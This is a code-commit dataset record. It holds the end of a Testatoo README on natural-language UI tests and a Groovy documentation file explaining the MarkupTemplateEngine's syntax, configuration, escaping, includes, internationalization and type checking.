this :\n\n-------------------------------------------------------------------------------\nassert that the maleRadio is unchecked\nand it has label \"Male\"\n\nassert that the femaleRadio is unchecked\nand it has label \"Female\"\n\ncheck the maleRadio\nassert that the maleRadio is checked\nassert that the femaleRadio is unchecked\n\ncheck the femaleRadio\nassert that the femaleRadio checked\nassert that the maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nThe Testatoo syntax to express this specification is :\n\n[source, groovy]\n-------------------------------------------------------------------------------\nassertThat {\n maleRadio.is(unchecked) and maleRadio.has label('Male')\n femaleRadio.is(unchecked) and femaleRadio.has label('Female')\n}\n\ncheck maleRadio\nassertThat maleRadio is checked\nassertThat femaleRadio is unchecked\n\ncheck femaleRadio\nassertThat femaleRadio is checked\nassertThat maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nPretty close isn't it ;)\n\nTestatoo provides a DSL to write tests in a natural language easy to manipulate for a specifications point of view.\nAs this is a high level language, it allows tests to be written before UI coding.\n\nYES, for the first time with Testatoo you can write UI functional test FIRST (yeah, it's pretty cool)\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8823d90ac0bee4b737a865ac41ffd3e472efaf8f","subject":"Make it clear that the template engine can be used to render any text based content","message":"Make it clear that the template engine can be used to render any text based 
content\n","repos":"yukangguo\/incubator-groovy,rlovtangen\/groovy-core,graemerocher\/incubator-groovy,jwagenleitner\/groovy,paulk-asert\/incubator-groovy,shils\/incubator-groovy,pickypg\/incubator-groovy,alien11689\/incubator-groovy,graemerocher\/incubator-groovy,sagarsane\/incubator-groovy,shils\/incubator-groovy,adjohnson916\/incubator-groovy,alien11689\/groovy-core,antoaravinth\/incubator-groovy,sagarsane\/incubator-groovy,kenzanmedia\/incubator-groovy,alien11689\/incubator-groovy,apache\/groovy,fpavageau\/groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,sagarsane\/groovy-core,ebourg\/incubator-groovy,paulk-asert\/groovy,sagarsane\/groovy-core,pledbrook\/incubator-groovy,genqiang\/incubator-groovy,taoguan\/incubator-groovy,bsideup\/incubator-groovy,ebourg\/incubator-groovy,PascalSchumacher\/incubator-groovy,groovy\/groovy-core,christoph-frick\/groovy-core,antoaravinth\/incubator-groovy,PascalSchumacher\/incubator-groovy,mariogarcia\/groovy-core,dpolivaev\/groovy,adjohnson916\/groovy-core,jwagenleitner\/incubator-groovy,avafanasiev\/groovy,armsargis\/groovy,armsargis\/groovy,sagarsane\/incubator-groovy,christoph-frick\/groovy-core,shils\/groovy,ebourg\/incubator-groovy,pledbrook\/incubator-groovy,tkruse\/incubator-groovy,apache\/incubator-groovy,pledbrook\/incubator-groovy,adjohnson916\/incubator-groovy,armsargis\/groovy,ebourg\/incubator-groovy,paulk-asert\/incubator-groovy,bsideup\/groovy-core,apache\/incubator-groovy,aaronzirbes\/incubator-groovy,graemerocher\/incubator-groovy,avafanasiev\/groovy,paulk-asert\/groovy,gillius\/incubator-groovy,adjohnson916\/groovy-core,guangying945\/incubator-groovy,mariogarcia\/groovy-core,kidaa\/incubator-groovy,genqiang\/incubator-groovy,i55ac\/incubator-groovy,EPadronU\/incubator-groovy,mariogarcia\/groovy-core,ChanJLee\/incubator-groovy,antoaravinth\/incubator-groovy,samanalysis\/incubator-groovy,upadhyayap\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/incubator-groovy,christoph-frick\/groovy-core,adjohnson916\/incubator-groovy,alien11689\/groovy-core,eginez\/incubator-groovy,EPadronU\/incubator-groovy,aaronzirbes\/incubator-groovy,adjohnson916\/incubator-groovy,aaronzirbes\/incubator-groovy,guangying945\/incubator-groovy,genqiang\/incubator-groovy,avafanasiev\/groovy,upadhyayap\/incubator-groovy,samanalysis\/incubator-groovy,nkhuyu\/incubator-groovy,russel\/groovy,PascalSchumacher\/incubator-groovy,ChanJLee\/incubator-groovy,dpolivaev\/groovy,gillius\/incubator-groovy,paulk-asert\/incubator-groovy,traneHead\/groovy-core,sagarsane\/groovy-core,alien11689\/groovy-core,kenzanmedia\/incubator-groovy,alien11689\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,kidaa\/incubator-groovy,russel\/groovy,paplorinc\/incubator-groovy,shils\/incubator-groovy,alien11689\/groovy-core,apache\/groovy,eginez\/incubator-groovy,bsideup\/groovy-core,samanalysis\/incubator-groovy,paulk-asert\/groovy,ebourg\/groovy-core,rabbitcount\/incubator-groovy,ebourg\/groovy-core,yukangguo\/incubator-groovy,pledbrook\/incubator-groovy,sagarsane\/incubator-groovy,shils\/groovy,i55ac\/incubator-groovy,rlovtangen\/groovy-core,tkruse\/incubator-groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,groovy\/groovy-core,shils\/groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,adjohnson916\/groovy-core,christoph-frick\/groovy-core,yukangguo\/incubator-groovy,mariogarcia\/groovy-core,i55ac\/incubator-groovy,bsideup\/incubator-groovy,paplorinc\/incubator-groovy,PascalSchumacher\/incubator-groovy,groovy\/groovy-core,russel\/incubator-groovy,EPadronU\/in
cubator-groovy,jwagenleitner\/incubator-groovy,guangying945\/incubator-groovy,groovy\/groovy-core,apache\/groovy,nkhuyu\/incubator-groovy,alien11689\/groovy-core,graemerocher\/incubator-groovy,nobeans\/incubator-groovy,ChanJLee\/incubator-groovy,aim-for-better\/incubator-groovy,taoguan\/incubator-groovy,jwagenleitner\/incubator-groovy,adjohnson916\/groovy-core,nobeans\/incubator-groovy,dpolivaev\/groovy,rlovtangen\/groovy-core,rabbitcount\/incubator-groovy,paplorinc\/incubator-groovy,fpavageau\/groovy,dpolivaev\/groovy,apache\/incubator-groovy,groovy\/groovy-core,EPadronU\/incubator-groovy,gillius\/incubator-groovy,russel\/groovy,rabbitcount\/incubator-groovy,russel\/incubator-groovy,shils\/incubator-groovy,rlovtangen\/groovy-core,rabbitcount\/incubator-groovy,eginez\/incubator-groovy,kidaa\/incubator-groovy,sagarsane\/groovy-core,aim-for-better\/incubator-groovy,paplorinc\/incubator-groovy,upadhyayap\/incubator-groovy,jwagenleitner\/groovy,russel\/incubator-groovy,traneHead\/groovy-core,samanalysis\/incubator-groovy,upadhyayap\/incubator-groovy,eginez\/incubator-groovy,kenzanmedia\/incubator-groovy,pickypg\/incubator-groovy,bsideup\/groovy-core,nkhuyu\/incubator-groovy,jwagenleitner\/groovy,apache\/groovy,genqiang\/incubator-groovy,guangying945\/incubator-groovy,avafanasiev\/groovy,russel\/incubator-groovy,kidaa\/incubator-groovy,christoph-frick\/groovy-core,nkhuyu\/incubator-groovy,taoguan\/incubator-groovy,mariogarcia\/groovy-core,aim-for-better\/incubator-groovy,yukangguo\/incubator-groovy,sagarsane\/groovy-core,paulk-asert\/groovy,alien11689\/incubator-groovy,gillius\/incubator-groovy,fpavageau\/groovy,aim-for-better\/incubator-groovy,traneHead\/groovy-core,nobeans\/incubator-groovy,ebourg\/groovy-core,pickypg\/incubator-groovy,tkruse\/incubator-groovy,jwagenleitner\/groovy,bsideup\/incubator-groovy,rlovtangen\/groovy-core,fpavageau\/groovy,PascalSchumacher\/incubator-groovy,tkruse\/incubator-groovy,traneHead\/groovy-core,nobeans\/incubator-groovy,kenzanmedia\/incubator-groovy,taoguan\/incubator-groovy,ebourg\/groovy-core,ChanJLee\/incubator-groovy,antoaravinth\/incubator-groovy,bsideup\/groovy-core,pickypg\/incubator-groovy,russel\/groovy,bsideup\/incubator-groovy","old_file":"subprojects\/groovy-templates\/src\/spec\/doc\/markup-template-engine.adoc","new_file":"subprojects\/groovy-templates\/src\/spec\/doc\/markup-template-engine.adoc","new_contents":"= The MarkupTemplateEngine\n\nThis template engine is a template engine primarily aimed at generating XML-like markup (XML, XHTML, HTML5, ...), but that\ncan be used to generate any text based content. Unlike traditional template engines, this one relies on a DSL that uses the\nbuilder syntax. 
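\n\nIn this style a tag is a method call, its attributes are named arguments and nesting is expressed with closures. A minimal conceptual sketch of such a template, mirroring the sample below (the `make` and `name` attributes are illustrative assumptions):\n\n[source,groovy]\n----\nxmlDeclaration()\ncars {\n    cars.each {\n        car(make: it.make, name: it.name)\n    }\n}\n----\n\n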
Here is a sample template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template,indent=0]\n----\n\nIf you feed it with the following model:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_model,indent=0]\n----\n\nIt would be rendered as:\n\n[source,xml]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_expected,indent=0]\n----\n\nThe key features of this template engine are:\n\n* a _markup builder like_ syntax\n* templates are compiled into bytecode\n* fast rendering\n* optional type checking of the model\n* includes\n* internationalization support\n\n== The template format\n=== Basics\n\nTemplates consist of Groovy code. Let's explore the first example more thoroughly:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template_with_bullets,indent=0]\n----\n<1> renders the XML declaration string.\n<2> opens a `cars` tag\n<3> `cars` is a variable found in the _template model_, which is a list of `Car` instances\n<4> for each item, we create a `car` tag with the attributes from the `Car` instance\n<5> closes the `cars` tag\n\nAs you can see, regular Groovy code can be used in the template. Here, we are calling `each` on a list (retrieved from the model), allowing us to\nrender one `car` tag per entry.\n\nIn a similar fashion, rendering HTML code is as simple as this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_template,indent=0]\n----\n<1> renders the HTML doctype special tag\n<2> opens the `html` tag with an attribute\n<3> opens the `head` tag\n<4> renders a `meta` tag with one `http-equiv` attribute\n<5> renders the `title` tag\n<6> closes the `head` tag\n<7> opens the `body` tag\n<8> renders a `p` tag\n<9> closes the `body` tag\n<10> closes the `html` tag\n\nThe output is straightforward:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_expected,indent=0]\n----\n\nNOTE: With some <<markuptemplate-config,configuration>>, you can have the output pretty printed, with newlines and indent automatically added.\n\n=== Support methods\n\nIn the previous example, the doctype declaration was rendered using the `yieldUnescaped` method. We have also seen the `xmlDeclaration` method.\nThe template engine provides several support methods that will help you render contents appropriately:\n\n[cols=\"1,2,3a\",options=\"header\"]\n|=======================================================================\n|Method|Description|Example\n|yield\n|Renders contents, but escapes it before rendering\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield_expected,indent=0]\n```\n|yieldUnescaped\n|Renders raw contents. 
The argument is rendered as is, without escaping.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped_expected,indent=0]\n```\n\n|xmlDeclaration\n|Renders an XML declaration String. If the encoding is specified in the configuration, it is written in the declaration.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|comment\n|Renders raw contents inside an XML comment\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment_expected,indent=0]\n```\n\n|newLine\n|Renders a new line. See also `TemplateConfiguration#setAutoNewLine` and `TemplateConfiguration#setNewLineString`.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline_expected,indent=0]\n```\n\n|pi\n|Renders an XML processing instruction.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi,indent=0]\n```\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi_expected,indent=0]\n```\n\n|tryEscape\n|Returns an escaped string for an object, if it is a `String` (or any type derived from `CharSequence`). Otherwise returns the object itself.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape_expected,indent=0]\n```\n\n|=======================================================================\n\n=== Includes\n\nThe `MarkupTemplateEngine` supports inclusion of contents from another file. 
Included contents may be:\n\n* another template\n* raw contents\n* contents to be escaped\n\nIncluding another template can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_template,indent=0]\n----\n\nIncluding a file as raw contents, without escaping it, can be done like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_raw,indent=0]\n----\n\nFinally, inclusion of text that should be escaped before rendering can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_escaped,indent=0]\n----\n\nAlternatively, you can use the following helper methods instead:\n\n* `includeGroovy(<name>)` to include another template\n* `includeEscaped(<name>)` to include another file with escaping\n* `includeUnescaped(<name>)` to include another file without escaping\n\nCalling those methods instead of the `include xxx:` syntax can be useful if the name of the file to be included is dynamic (stored in a variable for example).\nFiles to be included (independently of their type, template or text) are found on the *classpath*. This is one of the reasons why the `MarkupTemplateEngine` takes\nan optional `ClassLoader` as constructor argument (the other reason being that you can include code referencing other classes in a template).\n\nIf you don't want your templates to be on the classpath, the `MarkupTemplateEngine` accepts a convenient constructor that lets you define the directory where\ntemplates are to be found.\n\n== Rendering contents\n=== Creation of a template engine\nOn the server side, rendering templates requires an instance of `groovy.text.markup.MarkupTemplateEngine` and a\n`groovy.text.markup.TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_setup,indent=0]\n----\n<1> creates a template configuration\n<2> creates a template engine with this configuration\n<3> creates a template instance from a `String`\n<4> creates a model to be used in the template\n<5> binds the model to the template instance\n<6> renders output\n\nThere are several possible options to parse templates:\n\n* from a `String`, using `createTemplate(String)`\n* from a `Reader`, using `createTemplate(Reader)`\n* from a `URL`, using `createTemplate(URL)`\n* given a template name, using `createTemplateByPath(String)`\n\nThe last version should in general be preferred:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_by_name,indent=0]\n----\n\n[[markuptemplate-config]]\n=== Configuration options\n\nThe behavior of the engine can be tweaked with several configuration options accessible through the `TemplateConfiguration` class:\n\n[cols=\"1,1,2,3a\",options=\"header\"]\n|=======================================================================\n|Option|Default value|Description|Example\n|declarationEncoding\n|null\n|Determines the value of the encoding to be written when `xmlDeclaration` is called. 
It does *not* influence the writer you are using as output.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|expandEmptyElements\n|false\n|If true, empty tags are rendered in their expanded form.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_false,indent=0]\n```\n\nIf `expandEmptyElements` is true:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_true,indent=0]\n```\n\n|useDoubleQuotes\n|false\n|If true, use double quotes for attributes instead of single quotes\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_false,indent=0]\n```\n\nIf `useDoubleQuotes` is true:\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_true,indent=0]\n```\n\n|newLineString\n|System default (system property `line.separator`)\n|Allows choosing which string is used when a new line is rendered\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString,indent=0]\n```\n\nIf `newLineString='BAR'`:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString_expected,indent=0]\n```\n\n|autoEscape\n|false\n|If true, variables from models are automatically escaped before rendering.\n|See <<markuptemplate-autoescape, the auto escape section>>\n\n|autoIndent\n|false\n|If true, performs automatic indentation after new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoIndentString\n|four (4) spaces\n|The string to be used as indent.\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoNewLine\n|false\n|If true, performs automatic insertion of new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|baseTemplateClass\n|`groovy.text.markup.BaseTemplate`\n|Sets the super class of compiled templates. 
This can be used to provide application-specific templates.\n|See <<markuptemplate-basetemplate, the custom templates section>>\n\n|locale\n|Default locale\n|Sets the default locale for templates.\n|See <<markuptemplate-i18n, the internationalization section>>\n\n|=======================================================================\n\nWARNING: Once the template engine has been created, it is *unsafe* to change the configuration.\n\n[[markuptemplate-autoformat]]\n=== Automatic formatting\n\nBy default, the template engine will render output without any specific formatting. Some <<markuptemplate-config,configuration options>> can improve the situation:\n\n* `autoIndent` is responsible for auto-indenting after a new line is inserted\n* `autoNewLine` is responsible for automatically inserting new lines based on the original formatting of the template source\n\nIn general, it is recommended to set both `autoIndent` and `autoNewLine` to true if you want human-readable, pretty-printed output:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_setup,indent=0]\n----\n\nUsing the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template,indent=0]\n----\n\nThe output will now be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template_expected,indent=0]\n----\n\nWe can slightly change the template so that the `title` instruction is found on the same line as the `head` one:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2,indent=0]\n----\n\nAnd the output will reflect that:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2_expected,indent=0]\n----\n\nNew lines are *only* inserted where curly braces for tags are found, and the insertion corresponds to where the nested content is found. This means that\ntags in the body of another tag will *not* trigger new lines unless they use curly braces themselves:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3,indent=0]\n----\n<1> a new line is inserted because `meta` is not on the same line as `head`\n<2> no new line is inserted, because we're at the same depth as the previous tag\n<3> we can force rendering of a new line by explicitly calling `newLine`\n<4> and this tag will be rendered on a separate line\n\nThis time, the output will be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3_expected,indent=0]\n----\n\nBy default, the renderer uses four (4) spaces as indent, but you can change it by setting the `TemplateConfiguration#autoIndentString` property.\n\n[[markuptemplate-autoescape]]\n=== Automatic escaping\n\nBy default, content which is read from the model is rendered *as is*. If this content comes from user input, it can be sensitive, and you might\nwant to escape it by default, for example to avoid XSS injection. 
For that, the template configuration provides an option which will automatically\nescape objects from the model, as long as they inherit from `CharSequence` (typically, `String`s).\n\nLet's imagine the following setup:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup,indent=0]\n----\n\nand the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template,indent=0]\n----\n\nThen you wouldn't want the HTML from `unsafeContents` to be rendered as is, because of potential security issues:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_expected,indent=0]\n----\n\nAutomatic escaping will fix this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup_fixed,indent=0]\n----\n\nAnd now the output is properly escaped:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_fixed_expected,indent=0]\n----\n\nNote that using automatic escaping doesn't prevent you from including unescaped contents from the model. To do this, your template should then explicitly\nmention that a model variable should not be escaped by prefixing it with `unescaped.`, like in this example:\n\n[source,html]\n.Explicit bypass of automatic escaping\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_unescaped,indent=0]\n----\n\n[[markuptemplate-i18n]]\n=== Internationalization\n\nThe template engine has native support for internationalization. For that, when you create the `TemplateConfiguration`, you can provide\na `Locale` which is the default locale to be used for templates. Each template may have different versions, one for each locale. 
The\nname of the template makes the difference:\n\n* `file.tpl`: default template file\n* `file_fr_FR.tpl`: French version of the template\n* `file_en_US.tpl`: American English version of the template\n* ...\n\nWhen a template is rendered or included, then:\n\n* if the template name or include name *explicitly* sets a locale, the *specific* version is included, or the default version if not found\n* if the template name doesn't include a locale, the version for the `TemplateConfiguration` locale is used, or the default version if not found\n\nFor example, imagine the default locale is set to `Locale.ENGLISH` and that the main template includes:\n\n[source,groovy]\n.Use an explicit locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import,indent=0]\n----\n\nthen the template is rendered using the specific template:\n\n[source,html]\n.Bypass the template configuration\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import_expected,indent=0]\n----\n\nUsing an include without specifying a locale will make the template engine look for a template with the configured locale and, if none is found, fall back to the default, like here:\n\n[source,groovy]\n.Don't use a locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import,indent=0]\n----\n\n[source,html]\n.Fallback to the default template\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected,indent=0]\n----\n\nHowever, changing the default locale of the template engine to `Locale.FRANCE` will change the output, because the template engine will now look for a file\nwith the `fr_FR` locale:\n\n[source,html]\n.Don't fall back to the default template because a locale specific template was found\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected2,indent=0]\n----\n\nThis strategy lets you translate your templates one by one, by relying on default templates, for which no locale is set in the file name.\n\n[[markuptemplate-basetemplate]]\n=== Custom template classes\n\nBy default, created templates inherit the `groovy.text.markup.BaseTemplate` class. 
It may be interesting for an application to provide a different\ntemplate class, for example to provide additional helper methods which are aware of the application, or customized rendering primitives (for HTML,\nfor example).\n\nThe template engine provides this ability by setting an alternative `baseTemplateClass` in the `TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_config,indent=0]\n----\n\nThe custom base class has to extend `BaseTemplate`, like in this example:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MyTemplate.groovy[tags=basetemplate_class,indent=0]\n----\n\nThis example shows a class which provides an additional method named `hasModule`, which can then be used directly in the template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_template,indent=0]\n----\n\n== Type checked templates\n=== Optional type checking\n\nEven if templates are not type checked, they are statically compiled. This means that once the templates are compiled, performance should be very good. For some\napplications, it might be good to make sure that templates are valid before they are actually rendered. This means failing template compilation, for example, if\na method on a model variable doesn't exist.\n\nThe `MarkupTemplateEngine` provides such a facility. Templates can be optionally type checked. For that, the developer must provide additional information at\ntemplate creation time, namely the types of the variables found in the model. Imagine a model exposing a list of pages, where a page is defined as:\n\n[source,groovy]\n.Page.groovy\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=page_class,indent=0]\n----\n\nThen a list of pages can be exposed in the model, like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_no_stc,indent=0]\n----\n\nA template can use it easily:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_template,indent=0]\n----\n<1> iterate on pages from the model\n<2> `page.title` is valid\n<3> `page.text` is *not* (should be `page.body`)\n\nWithout type checking, the compilation of the template succeeds, because the template engine doesn't know about the model until a page\nis actually rendered. This means that the problem would only surface at runtime, once the page is rendered:\n\n.Runtime error\n----\nNo such property: text\n----\n\nIn some situations, this can be complicated to sort out or even notice. 
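\n\nTo make the failure mode concrete, here is a small, self-contained sketch of the same situation (the inlined template string and the rendering code are illustrative stand-ins for the spec-test sources included above; the `Page` class mirrors the one defined earlier); note how the bad property access only blows up once the output is actually rendered:\n\n[source,groovy]\n----\nimport groovy.text.markup.MarkupTemplateEngine\nimport groovy.text.markup.TemplateConfiguration\n\nclass Page {\n    String title\n    String body\n}\n\ndef engine = new MarkupTemplateEngine(new TemplateConfiguration())\n\n\/\/ 'page.text' is a typo for 'page.body', but the engine cannot know that yet\ndef template = engine.createTemplate('''\n    pages.each { page ->\n        p(page.text)\n    }\n''')\n\ndef output = template.make(pages: [new Page(title: 'Sample', body: 'Hello')])\n\ntry {\n    output.toString() \/\/ rendering happens here, and so does the failure\n} catch (MissingPropertyException e) {\n    assert e.message.contains('No such property: text')\n}\n----\n\nThe `toString()` call (or, equivalently, `writeTo(writer)`) is what actually evaluates the template body; in a real application it typically runs far away from the template source, which is why such errors are easy to miss.\n\n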
